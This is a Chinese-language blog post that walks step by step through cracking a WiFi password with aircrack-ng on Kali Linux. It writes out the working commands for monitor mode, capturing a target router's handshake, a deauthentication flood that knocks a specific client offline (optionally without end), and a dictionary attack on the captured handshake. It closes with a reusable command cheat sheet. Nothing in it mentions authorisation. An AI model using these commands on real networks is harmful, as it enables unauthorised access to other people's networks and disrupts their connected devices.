超強python黑客技術,aircrack-ng突破 wifi 密碼!

weixin_34342992發表於2018-11-15

開始前,先連上無線網路卡,因為虛擬機器中的kali系統不用呼叫筆記本自帶的無線網路卡,所以需要一個外接無線網路卡,然後接入kali系統。(加小編Python學習群:813542856獲取大量Python學習資料!)

11897912-4fef738c4fb3cdae
超強python黑客技術,aircrack-ng突破 wifi 密碼!

輸入 ifconfig -a 檢視網路卡,多了個 wlan0,說明網路卡已經適配好,不然可能是驅動有問題。

11897912-be0d2761ee04e91a
超強python黑客技術,aircrack-ng突破 wifi 密碼!

開啟monitor模式,這裡有些程式會影響到monitor模式的開啟,如果開啟成功可忽略,不然就依提示操作。

11897912-7b85a42ff244dffa
超強python黑客技術,aircrack-ng突破 wifi 密碼!

按提示操作的結果:

11897912-85f46dcf51c83344
超強python黑客技術,aircrack-ng突破 wifi 密碼!

監聽網路,完了 Ctrl+C 退出。

11897912-393519d50d5bd18e
超強python黑客技術,aircrack-ng突破 wifi 密碼!

主要引數說明:

#BSSID :路由器、AP的MAC地址

# PWR :訊號強度,一看就是越小越強了

# #Data :傳輸的資料大小,大的可能在下載或看視訊什麼的

# CH :無線通道,要看準

# ENC :加密協議,自WPA2協議爆出重大安全漏洞,現已經出WPA3,坐等更新

# ESSID :這個就不用多說了,wifi名稱,有中文可能會出現亂碼哈

3. 目標有了,開始對其進行cap包的監聽和獲取,這裡要讓其中連線的裝置重連才能抓包其握手包,可以慢慢等待,也可以使用deauth洪水攻擊。

root@huan:~#airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon

// -w 後面的路徑是存放握手包的

11897912-0cccf2f9c3aaca38
超強python黑客技術,aircrack-ng突破 wifi 密碼!

4. 另起視窗,我們用deauth洪水攻擊,讓其中的一臺裝置掉線,它掉線後會自動連線(除非別人在wifi設定中勾選掉了自動連線)

root@huan:~#aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon

// -0 death模式,20為攻擊次數,也可以設為0,就是一直攻擊

// -c 這裡自然就是連線上的某臺裝置的MAC地址了,指定它,我們讓它穩穩地掉線。

11897912-8ff474608ef43fdc
超強python黑客技術,aircrack-ng突破 wifi 密碼!

5. 看圖,不廢話

11897912-8aa45622f9c3412e
超強python黑客技術,aircrack-ng突破 wifi 密碼!

6. 話不多說,上字典(關鍵東西),讓它慢慢破去吧

root@huan:~#aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap

11897912-36f4c1e755e76bba
超強python黑客技術,aircrack-ng突破 wifi 密碼!

7. 沒錯下一步操作,退出monitor模式,別忘了喔

11897912-22997e1074db4f91
超強python黑客技術,aircrack-ng突破 wifi 密碼!

aircrack-ng 爆破wifi密碼 - 命令清單

~#airmon-ng start [網路卡] //開啟monitor模式

~#airodump-ng [網路卡] //捕獲附件的wifi資訊

~#airodump-ng -c [通道]--bssid [路由器MAC] -w [handshake-path] [網路卡]

~#aireplay-ng -0 [攻擊次數值] -c [某連線裝置MAC] -a [路由器MAC] [網路卡]

~#aircrack-ng -w [字典-path] [破解的目標握手包-path]

~#airmon-ng stop [網路卡] //退出monitor模式

相關文章